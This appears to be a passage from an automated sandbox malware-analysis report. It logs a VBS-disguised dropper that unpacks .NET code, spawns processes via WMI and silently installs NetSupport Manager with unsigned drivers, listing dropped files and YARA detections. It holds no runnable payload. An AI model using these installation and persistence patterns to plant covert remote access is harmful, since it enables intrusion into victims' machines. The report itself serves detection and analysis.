                                Source: Binary string: wmiclnt.pdb3 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: oleaut32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: comctl32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: crypt32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wbemprox.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: crypt32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp

                                Data Obfuscation

                                barindex
                                .NET source code contains potential unpacker
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                                Source: 3.2.Pyyidau.vbs.exe.8200000.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                                Source: 3.2.Pyyidau.vbs.exe.8200000.1.raw.unpack, ListDecorator.cs.Net Code: Read
                                Source: 3.2.Pyyidau.vbs.exe.8200000.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                                Source: 3.2.Pyyidau.vbs.exe.8200000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                                Source: 3.2.Pyyidau.vbs.exe.8200000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                                Yara detected Costura Assembly Loader
                                Source: Yara matchFile source: 3.2.Pyyidau.vbs.exe.bb10000.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.1883031177.000000000BB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B25490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,28_2_00B25490
                                Source: nspscr.sys.22.drStatic PE information: section name: PAGEABLE
                                Source: mfc140u.dll.22.drStatic PE information: section name: .didat
                                Source: libssl-1_1.dll.22.drStatic PE information: section name: .00cfg
                                Source: libcrypto-1_1.dll.22.drStatic PE information: section name: .00cfg
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B564CF push ecx; ret 28_2_00B564E2
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B3DD05 push ecx; ret 28_2_00B3DD18
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004C64CF push ecx; ret 30_2_004C64E2
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004ADD05 push ecx; ret 30_2_004ADD18
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EA80C5 push ecx; ret 31_2_00EA80D8
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EAE195 push 3BFFFFFFh; retf 31_2_00EAE19A
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EC04BF push ecx; ret 31_2_00EC04D2
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001E64CF push ecx; ret 32_2_001E64E2
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001CDD05 push ecx; ret 32_2_001CDD18

                                Persistence and Installation Behavior

                                barindex
                                Creates processes via WMI
                                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Drops HTML or HTM files to system directories
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\loca[1].htm
                                Drops executables to the windows directory (C:\Windows) and starts them
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI51C1.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI2BE4.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI264F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI3FCC.tmpJump to behavior
                                Sample is not signed and drops a device driver
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sysJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr2.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20FE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FDE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1C29.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F7E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI219F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1EEF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E8F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23F5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\vcruntime140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI264F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FCC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29BD.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100u.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI207D.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1ECF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI21DF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2504.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI215F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXEJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1B79.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI201E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1AFB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI57BD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2435.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI21BF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI51C1.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\shfolder.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F4F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20DE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F1F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1BC9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FBE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2610.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXEJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI204E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI25E0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1BA9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2465.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B06.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI24C5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2E95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI213F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4C31.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6914.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B65.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2485.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6963.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI51A0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DF0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI291F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sysJump to dropped file
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\SysWOW64\pcimsg.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E6F.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\client32provider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exeJump to dropped file
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Pyyidau.vbs.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI68D5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DD0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2BE4.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1C08.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20BE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI209E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\ucrtbase.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI222E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI211F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E3F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20FE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2610.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FDE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI204E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1C29.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI25E0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1BA9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F7E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2465.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B06.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI219F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1EEF.tmpJump to dropped file
